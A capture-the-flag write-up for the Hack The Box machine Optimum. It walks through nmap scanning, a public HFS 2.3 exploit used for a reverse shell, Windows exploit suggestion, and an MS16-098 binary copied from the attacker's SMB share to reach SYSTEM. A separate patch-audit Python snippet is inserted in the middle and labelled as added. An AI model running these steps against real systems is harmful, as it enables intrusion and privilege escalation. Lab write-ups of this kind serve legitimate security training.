OPTIMUM — HTB
MACHINE IP — 10.10.10.8
Nmap
# nmap -v -A -sVC -oN nmap 10.10.10.8
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008
Only the HTTP port (80) is open.
HttpFileServer (HFS) 2.3 is running on it.
Enumerating the whole page gave no useful hint, so I searched Google for vulnerabilities in this server version and found 39161.py on GitHub. This Python exploit gives a reverse shell, but it needs small changes in the script:
ip_addr = YOUR IP
local_port = YOUR PORT
NOTE: change these two values in the Python script (39161.py) to get the shell.
We got a reverse shell as the kostas user.
The whoami command confirms that we are kostas; the user hash is in C:\Users\kostas\Desktop\user.txt.txt.
To look for a way to Administrator privileges, run the systeminfo command:
systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36
System Boot Time: 11/12/2019, 5:04:15
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.461 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.901 MB
Virtual Memory: In Use: 602 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Copy this systeminfo output and paste it into a file on your local PC named systeminfo, then run the command below to check which vulnerabilities could be used against it:
./windows-exploit-suggester.py -d 2019-09-18-mssb.xls -i /root/vijay/htb/windows/optimum/systeminfo
1. ./windows-exploit-suggester.py --update
This gives you the latest file of exploits.
2. ./windows-exploit-suggester.py --database 2019-09-18-mssb.xls --systeminfo systeminfo
2019-09-08-mssb.xls - the file you get after the update command
systeminfo - the file into which you copied the Windows output of the systeminfo command
This Python script finds vulnerabilities in a Windows machine so that we can exploit them for privilege escalation.
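The same hotfix comparison seen from the patch-audit side, as an added example that is not part of the original write-up or of windows-exploit-suggester: it parses a saved systeminfo capture, rejects a truncated paste, and lists the baseline KBs the host does not report. The function names, the abridged sample and the baseline list are assumptions, and KB9999999 is a constructed placeholder.

```python
import re

# Constructed sample: abridged systeminfo capture in the layout shown above.
SAMPLE = """\
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB3000850
                           [03]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

HEADER = re.compile(r"^Hotfix\(s\):\s*(\d+) Hotfix\(s\) Installed\.")
ENTRY = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$")


def parse_systeminfo(text):
    """Return (os_name, os_version, hotfixes) from saved systeminfo output."""
    fields, hotfixes, declared, in_hotfix = {}, [], None, False
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            declared, in_hotfix = int(m.group(1)), True
            continue
        if in_hotfix:
            e = ENTRY.match(line)
            if e:
                hotfixes.append(e.group(1))
                continue
            in_hotfix = False  # first non-KB line ends the hotfix section
        key, sep, value = line.partition(":")
        if sep and not line.lstrip().startswith("["):  # skip [NN] sub-entries
            fields.setdefault(key.strip(), value.strip())
    if declared is None:
        raise ValueError("no Hotfix(s) section found")
    if declared != len(hotfixes):
        raise ValueError(f"capture truncated: {declared} declared, {len(hotfixes)} parsed")
    return fields.get("OS Name"), fields.get("OS Version"), hotfixes


def missing_updates(text, required):
    """KBs from a caller-supplied baseline that the host does not list."""
    installed = set(parse_systeminfo(text)[2])
    return sorted(kb for kb in required if kb not in installed)

if __name__ == "__main__":
    print(missing_updates(SAMPLE, ["KB3000850", "KB9999999"]))  # KB9999999: constructed placeholder
```

A KB absent from the list may have been superseded by a later rollup, so treat a miss as a lead to confirm against the vendor's supersedence data rather than as proof of exposure.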
We found the MS16-098 exploit to be useful. After searching for a while, I found a GitHub repository that had an .exe for it.
There I got the bfill.exe file. Now the main thing is to transfer this file to our target Windows machine.
I used the commands below to transfer the file to the Windows machine.
On my local PC:
python smbserver.py abc .
Then, on the Windows machine:
copy \\10.10.14.3\abc\bfill.exe vj.exe
Now we just have to run the exploit.
We got SYSTEM access and root.txt.
THANK YOU……